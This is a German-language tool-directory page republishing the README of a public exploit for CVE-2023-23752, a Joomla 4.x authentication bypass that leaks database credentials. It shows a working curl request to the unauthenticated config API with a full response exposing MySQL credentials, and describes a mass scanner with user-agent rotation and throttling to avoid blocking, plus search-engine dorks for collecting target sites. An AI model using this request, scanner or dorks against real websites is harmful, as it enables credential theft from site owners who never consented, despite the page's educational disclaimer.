Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-23752 — Exploit für CVE-2023-23752 (4.0.0 <= Joomla <= 4.2.7). | Kitploit
Tools/GitHubGitHub/pushkarup/cve-2023-23752
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsAuthentifizierung
GitHubpushkarup/cve-2023-23752

CVE-2023-23752

Exploit für CVE-2023-23752 (4.0.0 <= Joomla <= 4.2.7).

Repository anzeigen
1vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-23752

Exploit für CVE-2023-23752 (4.0.0 <= Joomla <= 4.2.7).

Einleitung

Wie besprochen handelt es sich bei CVE-2023-23752 um eine Umgehung der Authentifizierung, die zu einem Informationsleck führt. Die meisten öffentlichen Exploits nutzen die Umgehung, um die Systemkonfiguration preiszugeben, welche die Joomla!-MySQL-Datenbank-Anmeldedaten im Klartext enthält. Das Folgende zeigt das Leck:

root@kitploit:~
$ curl -v http://10.9.49.205/api/index.php/v1/config/application?public=true
*   Trying 10.9.49.205:80...
* TCP_NODELAY set
* Connected to 10.9.49.205 (10.9.49.205) port 80 (#0)
> GET /api/index.php/v1/config/application?public=true HTTP/1.1
> Host: 10.9.49.205
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 20 Mar 2023 15:14:05 GMT
< Server: Apache/2.4.41 (Ubuntu)
< x-frame-options: SAMEORIGIN
< referrer-policy: strict-origin-when-cross-origin
< cross-origin-opener-policy: same-origin
< X-Powered-By: JoomlaAPI/1.0
< Expires: Wed, 17 Aug 2005 00:00:00 GMT
< Last-Modified: Mon, 20 Mar 2023 15:14:05 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< Content-Length: 1983
< Content-Type: application/vnd.api+json; charset=utf-8
<
{"links":{"self":"http:\/\/10.9.49.205\/api\/index.php\/v1\/config\/application?public=true","next":"http:\/\/10.9.49.205\/api\/index.php\/v1\/config\/application?public=true&page%5Boffset%5D=20&page%5Blimit%5D=20","last":"http:\/\/10.9.49.205\/api\/index.php\/v1\/config\/application?public=true&page%5Boffset%5D=60&page%5Blimit%5D=20"},"data":[{"type":"application","id":"224","attributes":{"offline":false,"id":224}},{"type":"application","id":"224","attributes":{"offline_message":"This site is down for maintenance.<br>Please check back again soon.","id":224}},{"type":"application","id":"224","attributes":{"display_offline_message":1,"id":224}},{"type":"application","id":"224","attributes":{"offline_image":"","id":224}},{"type":"application","id":"224","attributes":{"sitename":"vulncheck","id":224}},{"type":"application","id":"224","attributes":{"editor":"tinymce","id":224}},{"type":"application","id":"224","attributes":{"captcha":"0","id":224}},{"type":"application","id":"224","attributes":{"list_limit":20,"i* Connection #0 to host 10.9.49.205 left intact
d":224}},{"type":"application","id":"224","attributes":{"access":1,"id":224}},{"type":"application","id":"224","attributes":{"debug":false,"id":224}},{"type":"application","id":"224","attributes":{"debug_lang":false,"id":224}},{"type":"application","id":"224","attributes":{"debug_lang_const":true,"id":224}},{"type":"application","id":"224","attributes":{"dbtype":"mysqli","id":224}},{"type":"application","id":"224","attributes":{"host":"localhost","id":224}},{"type":"application","id":"224","attributes":{"user":"root","id":224}},{"type":"application","id":"224","attributes":{"password":"labpass1","id":224}},{"type":"application","id":"224","attributes":{"db":"joomla_db","id":224}},{"type":"application","id":"224","attributes":{"dbprefix":"xj3n0_","id":224}},{"type":"application","id":"224","attributes":{"dbencryption":0,"id":224}},{"type":"application","id":"224","attributes":{"dbsslverifyservercert":false,"id":224}}],"meta":{"total-pages":4}}

In der obigen Machbarkeitsstudie antwortet der Server mit den Anmeldedaten root:labpass1, den Anmeldedaten für unser Test-Joomla!-MySQL-Konto. Es ist jedoch wichtig zu wissen, dass unser Test-MySQL-Server an 127.0.0.1 gebunden war, sodass der Angreifer nicht auf den Server zugreifen kann, was die Anmeldedaten größtenteils nutzlos macht. Die Bindung von MySQL an den lokalen Host sollte die häufigste Konfiguration sein, was dieses Datenleck stark einschränkt.

Haftungsausschluss: Nur zu Bildungszwecken

Dieser Exploit und Proof of Concept (PoC) dienen ausschließlich Bildungs- und Informationszwecken. Der Zweck der Bereitstellung besteht darin, potenzielle Schwachstellen in einer kontrollierten Umgebung zu demonstrieren. Ziel ist es, das Verständnis von Cybersicherheitskonzepten zu fördern und eine verantwortungsvolle Offenlegung zu unterstützen.

Wichtige Punkte:

  • Ethischer Einsatz: Dieser Exploit und PoC sollten nur in Umgebungen und Systemen eingesetzt werden, für die Sie eine ausdrückliche Genehmigung haben. Unautorisierter Zugriff auf Computersysteme ist illegal und unethisch.
  • Verantwortungsvolle Offenlegung: Wenn Sie durch diesen Exploit und PoC Schwachstellen entdecken, wird dringend empfohlen, diese verantwortungsvoll den betreffenden Parteien zu melden, damit diese ausreichend Zeit haben, die Probleme zu beheben und zu entschärfen.
  • Keine Befürwortung: Dieser PoC und die zugehörigen Materialien befürworten oder fördern keine Form von unbefugtem Zugriff, Hacking oder anderen illegalen Aktivitäten.

Durch den Zugriff auf und die Nutzung dieses Exploits und PoC erkennen Sie an, dass Sie allein für Ihre Handlungen verantwortlich sind und zustimmen, diese Informationen in Übereinstimmung mit den geltenden Gesetzen und Vorschriften zu verwenden. Der Autor übernimmt keine Haftung für Missbrauch oder Folgen, die aus der Nutzung dieses PoC für andere Zwecke als Bildung und verantwortungsvolle Offenlegung entstehen.

Exploit-Funktionen

  • EINZELSCAN: Scannt eine einzelne Seite nach einem Exploit.
  • MASSENSCAN: Scannt eine Liste von Seiten aus einer Datei nach einem Exploit.
  • ASYNCHRONE Threads: Nutzt Threads für schnelle Verarbeitung.
  • DYNAMISCHE DROSSELUNG: Implementiert eine dynamische Anforderungsdrosselung, um das Senden zu vieler Anfragen auf einmal zu vermeiden, was helfen kann, einer Blockierung zu entgehen.
  • ERGEBNISZUSAMMENFASSUNG: Fasst die Ergebnisse am Ende des Scans zusammen, mit Daten zu erfolgreichen Scans, erfolglosen Scans und etwaigen erkannten Problemen.
  • EINGABEPRÜFUNG: Implementiert eine Eingabevalidierung, um sicherzustellen, dass Benutzereingaben, insbesondere aus Dateien, korrekt strukturiert sind und legitime URLs enthalten.
  • USER-AGENT-ROTATION: Rotiert den User-Agent-Header für jede Anfrage, um verschiedene Browser zu imitieren und die Wahrscheinlichkeit einer Blockierung zu verringern.

Erste Schritte

Voraussetzungen

  • Python 3.x
  • Erforderliche Python-Pakete: requests, colorama, urllib3, fake_useragent, aio-http

Installation

  1. Repository klonen:

    root@kitploit:~
    git clone https://github.com/Pushkarup/CVE-2023-23752.git
    cd CVE-2023-23752
    
  2. Erforderliche Python-Pakete installieren:

    root@kitploit:~
    pip install -r requirements.txt
    

Verwendung

  1. Erstellen Sie eine Textdatei mit den Zielseiten (eine pro Zeile) und speichern Sie sie mit der Endung .txt.

    • Sammeln Sie eine Site-Liste zum Testen mithilfe des Dorks inurl:/api/index.php/v1/config/application?public=true, intitle:"Index of" /api/index.php/v1/config/application?public=true, filetype:php inurl:/api/index.php/v1/config/application?public=true, intitle:"Index of" AND intext:"config" AND intext:"application" AND intext:"public=true"
  2. Führen Sie das Skript aus:

    root@kitploit:~
    python joomla.py
    
  3. Lassen Sie das Skript seinen Lauf nehmen und folgen Sie den Anweisungen.

  4. Jede erfolgreich ausgebeutete Seite wird in Results.txt gespeichert.

Mitwirken

Beiträge sind willkommen! Wenn Sie Probleme finden oder Verbesserungen haben, können Sie gerne einen Pull Request eröffnen oder ein Issue erstellen.

Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert.

Kontakt

  • GitHub: Pushkar Upadhyay
  • LinkedIn: Pushkar Upadhyay

Spenden

Zeigen Sie Ihre Unterstützung

  • BTC: 3QqVBBzDBezA9U77PCTwMPQVGb1eecv2SP
  • ETH: 0xB779767483831BD98327A449C78FfccE2cc6df0a
  • USDT: 0xB779767483831BD98327A449C78FfccE2cc6df0a
Tool herunterladen